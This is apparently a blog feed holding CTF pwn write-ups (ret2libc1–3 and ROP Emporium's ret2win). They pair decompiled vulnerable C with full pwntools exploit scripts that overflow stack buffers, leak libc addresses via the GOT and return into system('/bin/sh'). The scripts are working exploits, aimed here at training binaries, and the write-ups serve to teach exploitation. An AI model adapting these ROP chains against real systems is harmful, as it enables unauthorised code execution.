class="line">sakura@Kylin:~/下载/ret2libc/ret2libc1$ checksec ret2libc1</span><br><span class="line">[*] '/home/sakura/下载/ret2libc/ret2libc1/ret2libc1'</span><br><span class="line"> Arch: i386-32-little</span><br><span class="line"> RELRO: Partial RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX enabled</span><br><span class="line"> PIE: No PIE (0x8048000)</span><br></pre></td></tr></table></figure><p>The program is 32-bit, with NX enabled.</p><h2 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h2><p>Load it into IDA to look at the source and locate the vulnerability.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">char</span> v4[<span class="number">100</span>]; <span class="comment">// [esp+1Ch] [ebp-64h] BYREF</span></span><br><span class="line"></span><br><span class="line"> setvbuf(<span class="built_in">stdout</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line"> setvbuf(_bss_start, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"RET2LIBC >_<"</span>);</span><br><span class="line"> gets(v4);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>We can see a gets function here, so we can be sure the stack overflow happens in gets.</p><h2 id="0x3"><a class="markdownIt-Anchor" href="#0x3"></a> 0x3</h2><p>Use ROPgadget to check whether a /bin/sh string is present.</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~/下载/ret2libc/ret2libc1$ ROPgadget --binary ret2libc1 --string '/bin/sh' </span><br><span class="line">Strings information</span><br><span class="line">============================================================</span><br><span class="line">0x08048720 : /bin/sh</span><br></pre></td></tr></table></figure><p>It is there; now look in IDA to see whether a system function is present.</p><p><img src="/2022/09/18/ret2libc/image-20220915163027797.png" alt="image-20220915163027797"></p><p>Then we simply return to system, i.e. execute the system function. The corresponding payload is as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#ret2libc1.py</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">'./ret2libc1'</span>)</span><br><span class="line"></span><br><span class="line">binsh = <span class="number">0x08048720</span></span><br><span class="line">system_plt = <span class="number">0x08048460</span></span><br><span class="line">payload = flat([<span class="string">b'a'</span> * <span class="number">112</span>, system_plt, <span class="string">b'b'</span> * <span class="number">4</span>, binsh])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure><p>Here we need to pay attention to the layout of the call stack: when system is called normally there is a corresponding return address on the stack, so here 'bbbb' serves as a fake return address, followed by the argument.</p><p>This example is relatively simple, since it provides both the address of system and the address of /bin/sh, but most programs are not so obliging.</p><p><img src="/2022/09/18/ret2libc/image-20220915162822205.png" alt="image-20220915162822205"></p><h1 id="ret2libc2"><a class="markdownIt-Anchor" href="#ret2libc2"></a> ret2libc2</h1><h2 id="0x1-2"><a class="markdownIt-Anchor" href="#0x1-2"></a> 0x1</h2><p>This challenge is essentially the same as ret2libc1, except that the /bin/sh string no longer appears, so this time we have to read the string in ourselves. <strong>So we need two gadgets: the first makes the program read the string, the second makes the program execute system("/bin/sh").</strong> Since the vulnerability is the same as above, it is not repeated here.</p><p><img src="/2022/09/18/ret2libc/image-20220915163514956.png" alt="image-20220915163514956"></p><p><img src="/2022/09/18/ret2libc/image-20220915163926447.png" alt="image-20220915163926447"></p><p><img src="/2022/09/18/ret2libc/image-20220915164247643.png" alt="image-20220915164247643"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">'./ret2libc2'</span>)</span><br><span class="line"></span><br><span class="line">gets_plt = <span class="number">0x08048460</span></span><br><span class="line">system_plt = <span class="number">0x08048490</span></span><br><span class="line">pop_ebx = <span class="number">0x0804843d</span></span><br><span class="line">buf2 = <span class="number">0x804a080</span></span><br><span class="line">payload = flat(</span><br><span class="line"> [<span class="string">b'a'</span> * <span class="number">112</span>, gets_plt, pop_ebx, buf2, system_plt, <span class="number">0xdeadbeef</span>, buf2])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.sendline(<span class="string">b'/bin/sh'</span>)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure><p><img src="/2022/09/18/ret2libc/image-20220915164417103.png" alt="image-20220915164417103"></p><h1 id="ret2libc3"><a class="markdownIt-Anchor" href="#ret2libc3"></a> ret2libc3</h1><h2 id="0x1-3"><a class="markdownIt-Anchor" href="#0x1-3"></a> 0x1</h2><p>Building on ret2libc2, the address of the system function is removed as well. Now we need to find both the address of system and the address of the /bin/sh string. First, check the protections.</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~/下载/ret2libc/ret2libc3$ file ret2libc3</span><br><span class="line">ret2libc3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=c0ad441ebd58b907740c1919460c37bb99bb65df, with debug_info, not stripped</span><br><span class="line">sakura@Kylin:~/下载/ret2libc/ret2libc3$ checksec ret2libc3</span><br><span class="line">[*] '/home/sakura/下载/ret2libc/ret2libc3/ret2libc3'</span><br><span class="line"> Arch: i386-32-little</span><br><span class="line"> RELRO: Partial RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX enabled</span><br><span class="line"> PIE: No PIE (0x8048000)</span><br></pre></td></tr></table></figure><p>As can be seen, the program still has non-executable stack protection enabled. Looking at the source, the bug is still a stack overflow</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">char</span> v4[<span class="number">100</span>]; <span class="comment">// [esp+1Ch] [ebp-64h] BYREF</span></span><br><span class="line"></span><br><span class="line"> setvbuf(<span class="built_in">stdout</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line"> setvbuf(<span class="built_in">stdin</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"No surprise anymore, system disappeard QQ."</span>);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Can you find it !?"</span>);</span><br><span class="line"> gets(v4);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h2 id="0x2-2"><a class="markdownIt-Anchor" href="#0x2-2"></a> 0x2</h2><p>So how do we get the address of the system function? This relies mainly on two facts</p><ul><li>system belongs to libc, and the relative offsets between functions inside the <a href="http://libc.so">libc.so</a> shared library are fixed.</li><li>Even with ASLR, only the middle bits of an address are randomized; the lowest 12 bits do not change. Libc builds have been collected on GitHub, see below</li><li><a href="https://github.com/niklasb/libc-database">https://github.com/niklasb/libc-database</a></li></ul><p>So if we know the address of some function in libc, we can determine which libc the program uses, and from that the address of system.</p><p>And how do we get the address of a function in libc? The usual method is a GOT leak, i.e. printing the contents of that function's GOT entry. <strong>Of course, because of libc's lazy binding, we need to leak the address of a function that has already been executed.</strong></p><p>We could follow the steps above to obtain the libc, then look up the offset in it, and then get the system address, but that is a lot of manual steps and rather tedious; here is a tool for working with libc, see its readme for details</p><ul><li><a href="https://github.com/lieanu/LibcSearcher">https://github.com/lieanu/LibcSearcher</a></li></ul><blockquote> <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># second argument: the leaked actual address, or just its last 12 bits (e.g. d90), as an int</span></span><br><span class="line">obj = LibcSearcher(<span class="string">"fgets"</span>, <span class="number">0X7ff39014bd90</span>)</span><br><span class="line"></span><br><span class="line">obj.dump(<span class="string">"system"</span>) <span class="comment"># offset of system</span></span><br><span class="line">obj.dump(<span class="string">"str_bin_sh"</span>) <span class="comment"># offset of /bin/sh</span></span><br><span class="line">obj.dump(<span class="string">"__libc_start_main_ret"</span>) </span><br></pre></td></tr></table></figure><p>If several libc versions are returned, you can add constraints with <code>add_condition(leaked_func, leaked_address)</code>, or pick one libc version by hand (if you are sure of it).</p></blockquote><p>Also, once we have the libc, libc itself contains a /bin/sh string, so we can obtain the address of /bin/sh at the same time.</p><hr><p><strong><a href="https://www.cnblogs.com/wgf4242/p/13091061.html">Overflow approach summary</a></strong></p><p>1. Leak the address of one function of ret2libc3</p><p>2. Determine the libc version (only functions that have already been executed have an address that can be obtained)</p><p>①<a href="https://libc.blukat.me/">https://libc.blukat.me</a></p><p>②LibcSearcher: <a href="https://github.com/lieanu/LibcSearcher">https://github.com/lieanu/LibcSearcher</a></p><p>3. Use the offsets to locate system and sh</p><p>①Compute the libc base address (dynamic address of a function minus that function's offset)</p><p>②Compute other function addresses (base address + function offset)</p><p>4. Run the program and get a shell</p><hr><p>Here we leak the address of __libc_start_main, since it is where the program first starts executing. The basic exploitation idea is as follows</p><ul><li>Leak the __libc_start_main address</li><li>Determine the libc version</li><li>Get the addresses of system and /bin/sh</li><li>Run the original program again</li><li>Trigger the stack overflow to execute system('/bin/sh')</li></ul><p>The exp is as follows:</p><p>1. Get the libc base address by hand</p><p>This needs three offsets, for system, puts and sh; the <a href="https://libc.blukat.me">libc database search</a> site can be used to get the libc base address</p><p><img src="/2022/09/18/ret2libc/image-20220916221437793.png" alt="image-20220916221437793"></p><p>They can also be obtained with commands (note that it is IO_puts; I kept searching for the address of puts and could not get it to work)</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">strings /lib/i386-linux-gnu/libc.so.6 -tx | grep "bin/sh"</span><br><span class="line">readelf -a /lib/i386-linux-gnu/libc.so.6| grep "IO_puts"</span><br><span class="line">readelf -a /lib/i386-linux-gnu/libc.so.6| grep "system"</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span
class="comment">#ret2libc3_auto.py</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line">sh = process(<span class="string">'./ret2libc3'</span>)</span><br><span class="line">ret2libc3 = ELF(<span class="string">'./ret2libc3'</span>)</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">puts_plt = ret2libc3.plt[<span class="string">'puts'</span>]</span><br><span class="line">puts_got = ret2libc3.got[<span class="string">'puts'</span>]</span><br><span class="line">main = ret2libc3.symbols[<span class="string">'_start'</span>]</span><br><span class="line"></span><br><span class="line"><span class="built_in">input</span>(<span class="string">"ready leak libc..."</span>)</span><br><span class="line">payload = flat([<span class="string">b'A'</span> * <span class="number">112</span>, puts_plt, main, puts_got])</span><br><span class="line">sh.sendlineafter(<span class="string">b'Can you find it !?'</span>, payload)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">"get the related addr"</span>)</span><br><span class="line">puts_addr = u32(sh.recv()[<span class="number">0</span>:<span class="number">4</span>])</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"puts:"</span> + <span class="built_in">hex</span>(puts_addr))</span><br><span class="line">libcbase = puts_addr - <span class="number">0x071cd0</span></span><br><span class="line">system_addr = libcbase + <span class="number">0x045830</span></span><br><span class="line">binsh_addr = libcbase + <span class="number">0x192352</span></span><br><span class="line"></span><br><span 
class="line"><span class="built_in">input</span>(<span class="string">"ready get shell"</span>)</span><br><span class="line">payload = flat([<span class="string">b'A'</span> * <span class="number">104</span>, system_addr, <span class="number">0xdeadbeef</span>, binsh_addr])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure><p><img src="/2022/09/18/ret2libc/image-20220916220159305.png" alt="image-20220916220159305"></p><p>2. Get the libc base address automatically with the tool</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#ret2libc3_auto.py</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span
class="keyword">import</span> LibcSearcher</span><br><span class="line">sh = process(<span class="string">'./ret2libc3'</span>)</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">ret2libc3 = ELF(<span class="string">'./ret2libc3'</span>)</span><br><span class="line">gdb.attach(sh, <span class="string">"break main"</span>)</span><br><span class="line"></span><br><span class="line">puts_got = ret2libc3.got[<span class="string">'puts'</span>]</span><br><span class="line">puts_plt = ret2libc3.plt[<span class="string">'puts'</span>]</span><br><span class="line">main = ret2libc3.symbols[<span class="string">'_start'</span>]</span><br><span class="line"></span><br><span class="line"><span class="built_in">input</span>(<span class="string">"leak puts_got addr and return to main again"</span>)</span><br><span class="line">payload = flat([<span class="string">b'A'</span> * <span class="number">112</span>, puts_plt, main, puts_got])</span><br><span class="line">sh.sendlineafter(<span class="string">b'Can you find it !?'</span>, payload)</span><br><span class="line"></span><br><span class="line"><span class="built_in">input</span>(<span class="string">"ready leak libc..."</span>)</span><br><span class="line">puts_addr = u32(sh.recv()[<span class="number">0</span>:<span class="number">4</span>])</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">"puts_addr: "</span>+ <span class="built_in">hex</span>(puts_addr))</span><br><span class="line"></span><br><span class="line">libc = LibcSearcher(<span class="string">'_IO_puts'</span>, puts_addr)</span><br><span class="line">libcbase = puts_addr - libc.dump(<span class="string">'_IO_puts'</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"libcbase: "</span>, <span class="built_in">hex</span>(libcbase))</span><br><span class="line"></span><br><span 
class="line">system_addr = libcbase + libc.dump(<span class="string">'system'</span>) <span class="comment">#0x04fa50</span></span><br><span class="line">binsh_addr = libcbase + libc.dump(<span class="string">'str_bin_sh'</span>) <span class="comment"># 0x1abf05</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">"system: "</span>+ <span class="built_in">hex</span>(system_addr)+<span class="string">"\n"</span>+<span class="string">"binsh:"</span> + <span class="built_in">hex</span>(binsh_addr))</span><br><span class="line"></span><br><span class="line"><span class="built_in">input</span>(<span class="string">"get shell"</span>)</span><br><span class="line">payload = flat([<span class="string">b'A'</span> * <span class="number">112</span>, system_addr, <span class="number">0xdeadbeef</span>, binsh_addr])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure><p><img src="/2022/09/18/ret2libc/image-20220916221028464.png" alt="image-20220916221028464"></p><blockquote><p>参考:</p><p><a href="https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#1">ROP</a></p><p><a href="https://blog.csdn.net/weixin_43363675/article/details/118056125">Stackoverflow Lab006: ret2libc3</a></p></blockquote>]]></content>
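How the lookup that LibcSearcher performs above actually works, as an added example that is not part of the original post and not LibcSearcher's code: the leaked GOT value is matched against a table of known builds by its page offset (the low 12 bits), the base is derived from the single matching build, and the base is rejected unless it is page-aligned. The table of two builds and all of their offsets are constructed for illustration and are not real glibc values; the sample leak is likewise constructed.

```python
# Constructed, hypothetical symbol tables for two libc builds (not real glibc offsets).
# Each entry maps a symbol name to its offset from the libc base.
LIBC_DB = {
    "libc-A.so": {"_IO_puts": 0x05f140, "system": 0x03ada0, "str_bin_sh": 0x15ba0b},
    "libc-B.so": {"_IO_puts": 0x0655f0, "system": 0x045830, "str_bin_sh": 0x18cd57},
}


def parse_leak(data, nbytes=4):
    """Decode the address puts() wrote back, little-endian.
    puts() prints up to the first NUL byte: on x86 the whole 4-byte address comes
    back; on x86-64 user-space addresses have two leading zero bytes, so only 6
    bytes arrive and the caller passes nbytes=6. Missing high bytes are zero."""
    raw = data[:nbytes].ljust(8, b"\x00")
    return int.from_bytes(raw, "little")


def match_libc(symbol, leaked, db=LIBC_DB):
    """Builds whose offset for `symbol` agrees with the leak in the low 12 bits.
    ASLR maps libc at a page boundary, so the page offset of a symbol is a property
    of the build, not of the process."""
    return sorted(name for name, syms in db.items()
                  if syms[symbol] % 0x1000 == leaked % 0x1000)


def resolve(symbol, leaked, db=LIBC_DB):
    """Pick the matching build, derive the base and the addresses the ROP chain needs."""
    candidates = match_libc(symbol, leaked, db)
    if len(candidates) != 1:
        raise ValueError("expected exactly one matching libc, got %r" % candidates)
    syms = db[candidates[0]]
    base = leaked - syms[symbol]
    if base % 0x1000 != 0:
        # cannot happen when the low 12 bits matched, but it is the check to keep
        # when the offsets come from a libc the solver picked by hand
        raise ValueError("base 0x%x is not page aligned" % base)
    return {
        "libc": candidates[0],
        "base": base,
        "system": base + syms["system"],
        "binsh": base + syms["str_bin_sh"],
    }


# Constructed sample: what sh.recv() would return after puts(puts_got) on a run where
# the hypothetical libc-A.so was mapped at 0xf7d20000. puts() appends the newline.
SAMPLE_LEAK = (0xf7d20000 + 0x05f140).to_bytes(4, "little") + b"\n"

if __name__ == "__main__":
    leak = parse_leak(SAMPLE_LEAK)
    info = resolve("_IO_puts", leak)
    for key, value in info.items():
        print(key, hex(value) if isinstance(value, int) else value)
```

With a real database the low 12 bits frequently match more than one build; that is exactly the situation in which LibcSearcher asks you to choose, and the page-alignment check and a test run are the only ways to tell the candidates apart.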
<summary type="html"><blockquote>
<p><a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/stackoverflow">题目地址</a> ret2libc</p>
</blockquote>
<h1 i</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="ret2libc" scheme="https://www.rgzzplus.com/tags/ret2libc/"/>
</entry>
<entry>
<title>ret2win</title>
<link href="https://www.rgzzplus.com/2022/09/18/ret2win/"/>
<id>https://www.rgzzplus.com/2022/09/18/ret2win/</id>
<published>2022-09-18T02:24:30.000Z</published>
<updated>2022-09-18T02:30:15.432Z</updated>
<content type="html"><![CDATA[<blockquote><p>Challenge: <a href="https://ropemporium.com/challenge/ret2win.html">ret2win</a></p></blockquote><h2 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h2><p>First, check the file type and which mitigations are enabled.</p><figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">sakura@Kylin:~/下载/ret2win$ file ret2win</span><br><span class="line">ret2win: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=19abc0b3bb228157af55b8e16af7316d54ab0597, not stripped</span><br><span class="line">sakura@Kylin:~/下载/ret2win$ checksec ret2win</span><br><span class="line">[*] '/home/sakura/下载/ret2win/ret2win'</span><br><span class="line"> Arch: amd64-64-little</span><br><span class="line"> RELRO: Partial RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX enabled</span><br><span class="line"> PIE: No PIE (0x400000)</span><br></pre></td></tr></table></figure><p>It is a 64-bit binary and, apart from partial RELRO, the only mitigation enabled is NX: the stack is not executable, so injected shellcode cannot run and we have to reuse code that is already in the binary, which is what ROP does. There is no canary, so the return address can be overwritten, and without PIE every address in the binary is known in advance.</p><h2 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h2><p>Next, load it into IDA.</p><figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">{</span><br><span class="line"> setvbuf(_bss_start, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"ret2win by ROP Emporium"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"x86_64\n"</span>);</span><br><span class="line"> pwnme();</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"\nExiting"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br><span class="line"><span class="type">int</span> <span class="title function_">pwnme</span><span class="params">()</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">char</span> s[<span class="number">32</span>]; <span class="comment">// [rsp+0h] [rbp-20h] BYREF</span></span><br><span class="line"></span><br><span class="line"> <span class="built_in">memset</span>(s, <span class="number">0</span>, <span class="keyword">sizeof</span>(s));</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"What could possibly go wrong?"</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"You there, may I have your input please? And don't worry about null bytes, we're using read()!\n"</span>);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"> "</span>);</span><br><span class="line"> read(<span class="number">0</span>, s, <span class="number">0x38</span>uLL);</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"Thank you!"</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><code>pwnme()</code> reads up to 0x38 = 56 bytes into a 32-byte stack buffer, and <code>read()</code> does not stop at NUL bytes, so addresses containing zero bytes can be sent. The binary also contains a <code>ret2win()</code> function that nothing calls:</p><figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">ret2win</span><span class="params">()</span></span><br><span class="line">{</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"Well done! Here's your flag:"</span>);</span><br><span class="line"> <span class="keyword">return</span> system(<span class="string">"/bin/cat flag.txt"</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><img src="/2022/09/18/ret2win/image-20220912214133774.png" alt="image-20220912214133774"></p><p>It prints flag.txt, so overwriting the return address with its address, 0x400756, is enough to call it.</p><p>First, find out how many bytes of padding it takes to reach the return address.</p><p>As usual, in peda run <code>pattern create 200</code>, feed the pattern to the program and step to the <code>ret</code> instruction; the stack then looks like this:<br><img src="/2022/09/18/ret2win/image-20220912215027379.png" alt="image-20220912215027379"></p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">pattern offset AA0AAFAAbAA1AAGA</span><br><span class="line">AA0AAFAAbAA1AAGA found at offset: 40</span><br></pre></td></tr></table></figure><p>The offset of 40 is the 32-byte buffer plus the 8-byte saved rbp that sits between the buffer and the return address. read() accepts 56 bytes, which leaves exactly 16 bytes for the return address and one more 8-byte word after it.</p><h2 id="0x3"><a class="markdownIt-Anchor" href="#0x3"></a> 0x3</h2><p>Build the script <code>ret2win.py</code>:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">p = process(<span class="string">"./ret2win"</span>)</span><br><span class="line">gdb.attach(p, <span class="string">"break main"</span>)</span><br><span class="line">bin_addr = <span class="number">0x400756</span>  <span class="comment"># address of ret2win(), including its push rbp; mov rbp, rsp prologue</span></span><br><span class="line">payload = <span class="string">b'a'</span>*<span class="number">40</span> + p64(bin_addr)  <span class="comment"># 32-byte buffer + saved rbp, then the return address</span></span><br><span class="line">p.recvuntil(<span class="string">b"> "</span>)</span><br><span class="line"><span class="built_in">input</span>(<span class="string">"already..."</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"><span class="built_in">input</span>(<span class="string">"send payload after..."</span>)</span><br><span class="line">p.recvuntil(<span class="string">b"Here's your flag: "</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><p>When I tested this locally I ran into the problem below; according to <a href="https://www.freesion.com/article/3772838918/">this write-up of the same problem</a>, the cause is a stack operation that leaves the stack unaligned to 0x10.</p><p><img src="/2022/09/18/ret2win/image-20220912232441944.png" alt="image-20220912232441944"></p><p>Setting <code>bin_addr = 0x40075a</code> in <code>ret2win.py</code>, which skips that stack operation, fixes it.</p><p>The underlying reason: the System V x86-64 ABI requires rsp to be 16-byte aligned at every <code>call</code> instruction, and glibc's system() relies on this (it uses <code>movaps</code> on stack memory, which faults on a misaligned address). Entering ret2win() through a <code>ret</code> rather than a <code>call</code> leaves rsp off by 8 bytes, so the <code>call system</code> inside ret2win() runs with a misaligned stack. Skipping the <code>push rbp; mov rbp, rsp</code> prologue (0x400756 + 4 = 0x40075a) restores the alignment; returning first to a lone <code>ret</code> gadget and then to 0x400756 works for the same reason.</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#context.log_level = 'debug'</span></span><br><span class="line"></span><br><span class="line">p = process(<span class="string">"./ret2win"</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p, "break main")</span></span><br><span class="line">bin_addr = <span class="number">0x40075a</span>  <span class="comment"># ret2win() + 4: skip push rbp; mov rbp, rsp so rsp is 16-byte aligned at call system</span></span><br><span class="line">payload = <span class="string">b'a'</span>*<span class="number">40</span> + p64(bin_addr)</span><br><span class="line">p.recvuntil(<span class="string">b"> "</span>)</span><br><span class="line"><span class="comment">#input("already")</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"><span class="comment">#input("send payload after")</span></span><br><span class="line">p.recvuntil(<span class="string">b"Here's your flag:\n"</span>)</span><br><span class="line">flag=p.recvline()</span><br><span class="line"><span class="comment">#p.interactive()</span></span><br><span class="line"><span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure><p>Result:</p><p><img src="/2022/09/18/ret2win/image-20220912233639670.png" alt="image-20220912233639670"></p>]]></content>
